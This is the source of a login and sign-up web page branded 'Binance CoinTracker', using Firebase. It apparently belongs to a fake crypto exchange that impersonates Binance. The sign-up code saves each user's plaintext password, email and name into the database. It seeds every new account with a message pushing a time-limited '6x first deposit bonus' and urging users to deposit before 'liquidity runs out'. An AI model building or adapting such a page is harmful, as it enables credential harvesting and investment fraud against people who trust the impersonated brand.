<!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <script src="https://kit.fontawesome.com/1c6a2f7ca0.js" crossorigin="anonymous"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js" integrity="sha512-E8QSvWZ0eCLGk4km3hxSsNmGWbLtSCSUcewDQPQWZF6pEU8GlT8a5fF32wOl1i8ftdMhssTrF/OhyGWwonTcXA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
        
        <!-- Service worker tips -->
        <link rel="icon" href="module/img/binance.png">
        
        <!-- Bootstrap link -->
        <link rel="stylesheet" href="module/css/bootstrap.css">
        <link rel="stylesheet" href="module/css/style.css">

        <!-- Title of the page -->
        <title>Binance CoinTracker</title>
        
        <style>
            body{
                font-family: 'Poppins', sans-serif;
                font-weight: 300;
                font-size: 15px;
                line-height: 1.7;
                color: #c4c3ca;
                background-color: #F8F7FA;
                overflow-x: hidden;
            }
            

            /* width */
            ::-webkit-scrollbar {
                width: 0.35em;
                margin: 2em 0;
            }
            /* Track */
            ::-webkit-scrollbar-track {
                box-shadow: inset 0 0 5px #b4b4b4; 
            }
            /* Handle */
            ::-webkit-scrollbar-thumb {
                background: #adadad; 
                border-radius: 0.5em;
            }
            /* Handle on hover */
            ::-webkit-scrollbar-thumb:hover {
                background: #8a8a8a; 
            }
            /* -------------------- */ 
            a {
                cursor: pointer;
                transition: all 200ms linear;
            }
            a:hover {
                text-decoration: none;
            }
            .link {
                color: #c4c3ca;
            }
            .link:hover {
                color: #ffeba7;
            }
            p {
                font-weight: 500;
                font-size: 14px;
                line-height: 1.7;
            }
            h4 {
                font-weight: 600;
            }
            h6 span{
                padding: 0 20px;
                text-transform: uppercase;
                font-weight: 700;
            }
            .section{
                position: relative;
                width: 100%;
                display: block;
            }
            .full-height{
                min-height: 100vh;
            }
            [type="checkbox"]:checked,
            [type="checkbox"]:not(:checked){
                position: absolute;
                left: -9999px;
            }
            .checkbox:checked + label,
            .checkbox:not(:checked) + label{
                position: relative;
                display: block;
                text-align: center;
                width: 60px;
                height: 16px;
                border-radius: 8px;
                padding: 0;
                margin: 10px auto;
                cursor: pointer;
                background-color: #ffeba7;
            }
            .checkbox:checked + label:before,
            .checkbox:not(:checked) + label:before{
                position: absolute;
                display: block;
                width: 36px;
                height: 36px;
                border-radius: 50%;
                color: #ffeba7;
                background-color: #102770;
                font-family: 'unicons';
                content: '\eb4f';
                z-index: 20;
                top: -10px;
                left: -10px;
                line-height: 36px;
                text-align: center;
                font-size: 24px;
                transition: all 0.5s ease;
            }
            .checkbox:checked + label:before {
                transform: translateX(44px) rotate(-270deg);
            }


            .card-3d-wrap {
                position: relative;
                width: 440px;
                max-width: 100%;
                height: 400px;
                -webkit-transform-style: preserve-3d;
                transform-style: preserve-3d;
                perspective: 800px;
                margin-top: 60px;
            }
            .card-3d-wrapper {
                width: 100%;
                height: 100%;
                position:absolute;    
                top: 0;
                left: 0;  
                -webkit-transform-style: preserve-3d;
                transform-style: preserve-3d;
                transition: all 600ms ease-out; 
            }
            .card-front, .card-back {
                width: 100%;
                height: 100%;
                background-color: #2a2b38;
                background-image: url('module/img/pat.svg');
                background-position: bottom center;
                background-repeat: no-repeat;
                background-size: 300%;
                position: absolute;
                border-radius: 6px;
                left: 0;
                top: 0;
                -webkit-transform-style: preserve-3d;
                transform-style: preserve-3d;
                -webkit-backface-visibility: hidden;
                -moz-backface-visibility: hidden;
                -o-backface-visibility: hidden;
                backface-visibility: hidden;
            }
            .card-back {
                transform: rotateY(180deg);
            }
            .checkbox:checked ~ .card-3d-wrap .card-3d-wrapper {
                transform: rotateY(180deg);
            }
            .center-wrap{
                position: absolute;
                width: 100%;
                padding: 0 35px;
                top: 50%;
                left: 0;
                transform: translate3d(0, -50%, 35px) perspective(100px);
                z-index: 20;
                display: block;
            }


            .form-group{ 
                position: relative;
                display: block;
                margin: 0;
                padding: 0;
            }
            .form-style {
                padding: 13px 20px;
                padding-left: 55px;
                height: 48px;
                width: 100%;
                font-weight: 500;
                border-radius: 4px;
                font-size: 14px;
                line-height: 22px;
                letter-spacing: 0.5px;
                outline: none;
                color: #c4c3ca;
                background-color: #1f2029;
                border: none;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
                box-shadow: 0 4px 8px 0 rgba(21,21,21,.2);
            }
            .form-style:focus,
            .form-style:active {
                border: none;
                outline: none;
                box-shadow: 0 4px 8px 0 rgba(21,21,21,.2);
            }
            .input-icon {
                position: absolute;
                top: 0;
                left: 18px;
                height: 48px;
                font-size: 24px;
                line-height: 48px;
                text-align: left;
                color: #ffeba7;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }

            .form-group input:-ms-input-placeholder  {
                color: #c4c3ca;
                opacity: 0.7;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input::-moz-placeholder  {
                color: #c4c3ca;
                opacity: 0.7;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input:-moz-placeholder  {
                color: #c4c3ca;
                opacity: 0.7;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input::-webkit-input-placeholder  {
                color: #c4c3ca;
                opacity: 0.7;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input:focus:-ms-input-placeholder  {
                opacity: 0;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input:focus::-moz-placeholder  {
                opacity: 0;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input:focus:-moz-placeholder  {
                opacity: 0;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }
            .form-group input:focus::-webkit-input-placeholder  {
                opacity: 0;
                -webkit-transition: all 200ms linear;
                transition: all 200ms linear;
            }

            .btn{  
                border-radius: 4px;
                height: 44px;
                font-size: 13px;
                font-weight: 600;
                text-transform: uppercase;
                -webkit-transition : all 200ms linear;
                transition: all 200ms linear;
                padding: 0 30px;
                letter-spacing: 1px;
                display: -webkit-inline-flex;
                display: -ms-inline-flexbox;
                display: inline-flex;
                -webkit-align-items: center;
                -moz-align-items: center;
                -ms-align-items: center;
                align-items: center;
                -webkit-justify-content: center;
                -moz-justify-content: center;
                -ms-justify-content: center;
                justify-content: center;
                -ms-flex-pack: center;
                text-align: center;
                border: none;
                background-color: #ffeba7;
                color: #102770;
                box-shadow: 0 8px 24px 0 rgba(255,235,167,.2);
            }
            .btn:active,
            .btn:focus{  
                background-color: #102770;
                color: #ffeba7;
                box-shadow: 0 8px 24px 0 rgba(16,39,112,.2);
            }
            .btn:hover{  
                background-color: #102770;
                color: #ffeba7;
                box-shadow: 0 8px 24px 0 rgba(16,39,112,.2);
            }

            .noted{
                padding-top: 1em;
                font-size: 1.3em;
                text-align: center;
                font-weight: 700;
            }
        </style>
    </head>
    <body>
        <div class="section">
            <!-- -------------------- Header Container -------------------- -->
                <div class="help-header-wrap" style="background: #FFE77B;">
                    <div class="container">
                        <div class="help-header-container">
                            <!-- Left container-->
                            <div class="help-left-container">
                                <span class="help-header-txt one-line" style="color: #000;">Binance CoinTracker Log-In / Sign-Up</span>
                            </div>
                            <!-- Right container-->
                            <div class="help-header-img"></div>
                        </div>
                    </div>
                </div>
            <!-- -------------------- -------------------- -------------------- -->
            <!-- -------------------- -------------------- -------------------- -->

            <div class="container">
                <div class="row full-height justify-content-center">
                    <div class="col-12 text-center align-self-center py-5">
                        <div class="section pb-5 pt-5 pt-sm-2 text-center">
                            <h6 class="mb-0 pb-3" style="color: #000;"><span class="cursor log-in">Log In </span><span class="cursor sign-up">Sign Up</span></h6>
                            <input class="checkbox" type="checkbox" id="reg-log" name="reg-log"/>
                            <label for="reg-log"></label>
                            <div class="noted" style="color: #000;">Press the Toggle button above to toggle between "Log-in" and "Registration" pages.</div>
                            <center><small><span id="error" style="color: #ff0000;text-align: center;"></span></small></center>
                            <div class="card-3d-wrap mx-auto">
                                <div class="card-3d-wrapper">
                                    <div class="card-front">
                                        <div class="center-wrap">
                                            <div class="section text-center">
                                                <h4 class="mb-4 pb-3">Log In</h4>
                                                <div class="form-group">
                                                    <input type="email" onchange="getLogEmail(event)" name="logemail" class="form-style" placeholder="Your Email" id="logemail" autocomplete="off" required>
                                                    <i class="fa-regular i input-icon fa-envelope"></i>
                                                </div>	
                                                <div class="form-group mt-2">
                                                    <input type="password" onchange="getLogPass(event)" name="logpass" class="form-style" placeholder="Your Password" id="logpass" autocomplete="off" required>
                                                    <i class="fa-solid i input-icon fa-unlock-keyhole"></i>
                                                </div>
                                                <button href="#" class="btn mt-4" onclick="login()">submit</button>
                                                <p class="mb-0 mt-4 text-center"><a onclick="document.location.href='js/supp.html'" class="link">Forgoten your password? Contact Support</a></p>
                                              </div>
                                          </div>
                                      </div>
                                    <div class="card-back">
                                        <div class="center-wrap">
                                            <div class="section text-center">
                                                <h4 class="mb-4 pb-3">Sign Up</h4>
                                                <div class="form-group">
                                                    <input type="text" onchange="getName(event)" name="logname" id="name" class="form-style" placeholder="Your Full Name" id="logname" autocomplete="off" required>
                                                    <i class="fa-solid i input-icon fa-user-tie"></i>
                                                </div>	
                                                <div class="form-group mt-2">
                                                    <input type="email" onchange="getEmail(event)" name="logemail" id="email" class="form-style" placeholder="Your Email" id="logemail" autocomplete="off" required>
                                                    <i class="fa-regular i input-icon fa-envelope"></i>
                                                </div>	
                                                <div class="form-group mt-2">
                                                    <input type="password" onchange="getPassword(event)" id="password" name="pass" class="form-style" placeholder="Your Password" id="logpass" autocomplete="off" required>
                                                    <i class="fa-solid i input-icon fa-unlock-keyhole"></i>
                                                </div>
                                                <button id="sub_btn" href="#" class="btn mt-4" onclick="signUp()">submit</button>
                                              </div>
                                          </div>
                                      </div>
                                  </div>
                              </div>
                          </div>
                      </div>
                  </div>
            </div>
        </div>
    </body>
    <script src="module/js/firebase.js"></script>
    <script src="https://www.gstatic.com/firebasejs/8.6.7/firebase.js"></script>
    <script>
        // Initialize Firebase
        firebase.initializeApp(firebaseConfig);
        var firebasefiledir = firebase.database().ref('User');

        // -------------------------------------------- main configuration
        firebase.auth().onAuthStateChanged((user)=>{
            if(user){
                location.replace("module/dashboard.html")
            }
        })

        // Login
        var logEmail;
        var logPass;
        function getLogEmail(e) {
            logEmail = e.target.value;
        }
        function getLogPass(e) {
            logPass = e.target.value;
        }
        function login(){
            const email = logEmail;
            const password = logPass;
            firebase.auth().signInWithEmailAndPassword(email, password)
            .then(function(response){
                console.log("success");
            })
            .catch((error)=>{
                document.getElementById("error").innerHTML = error.message
            })
        }

        // Sign up
        var dname;
        var demail;
        var dpassword;
        function getName(e) {
            dname = e.target.value;
        }
        function getEmail(e) {
            demail = e.target.value;
        }
        function getPassword(e) {
            dpassword = e.target.value;
        }
        
        
        function signUp(){
            const email = demail;
            const password = dpassword;
            firebase.auth().createUserWithEmailAndPassword(email, password)
            .then(function(response){
                console.log("success");
                firebasefiledir.push({
                    messages: `
                        <!-- -------------------- Assets Binance card container ----- Message [1] -------------------- -->
                            <div class="notify-card-wrap">
                                <div class="assets-card-background"></div>
                                <div class="container">
                                    <div class="assets-card-first-pad">
                                        <div class="container">
                                            <!-- Asset card first row -->
                                            <div class="assets-card-first-row">
                                                <div class="assets-card-first-left">
                                                    <div class="assets-card-binance-logo">
                                                        <img src="img/binance.png" class="img-fluid">
                                                    </div>
                                                    <span class="assets-card-user-txt one-line">Binance CoinTracker</span>
                                                </div>
                                                <div class="assets-card-first-img">
                                                    <img src="img/user.png" class="img-fluid">
                                                </div>
                                            </div>
                                            
                                            <!--  -->
                                            <div class="notify-img-box"><img src="img/binance_192.png" class="img-fluid ordinary"></div>
                                            <p class="notify-img-txt line-height">
                                                Welcome to Binance CoinTracker, you have a very limited time to take advantage of the ongoing 6x first deposit bonus. All you need to do is confirm this account and deposit funds before the liquidity runs out. The promotion also includes the benefits of the fastest transaction time, 98% reduced transaction charges, and, most importantly, the world's most powerful and monitored security system.
                                            </p>
                                        </div>
                                    </div>
                                </div>
                                <!-- Seperation line -->
                                <div class="assets-card-line"></div>
                                
                                <div class="assets-card-second-pad">
                                    <div class="container-fluid">
                                        <div class="container-fluid">
                                            <div class="row">
                                                <div class="col-12 p-2">
                                                    <div class="notify-card-btn" onclick="HomeToNotification()">
                                                        Verify account
                                                    </div>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        <!-- -------------------- -------------------- -------------------- -->
                        <!-- -------------------- -------------------- -------------------- -->
                    `,
                    balance: "0.00",
                    invite: "0.00",
                    invitesnumber: "--",
                    bitcoin: 0,
                    ethereum: 0,
                    litecoin: 0,
                    dogecoin: 0,
                    tetherusd: 0,
                    tron: 0,
                    tetherusdt: 0,
                    usdcoin: 0,
                    bnbcoin: 0,
                    binanceusd: 0,
                    avalanche: 0,
                    binanceusdt: 0,
                    solana: 0,
                    email: demail,
                    name: dname,
                    password: dpassword,
                    userurl: "Binance CoinTracker",
                    userstatus: false,
                    uid: response.user.uid
                })
            })
            .catch((error) => {
                document.getElementById("error").innerHTML = error.message;
                console.log(error);
            });
        }
    </script>
</html>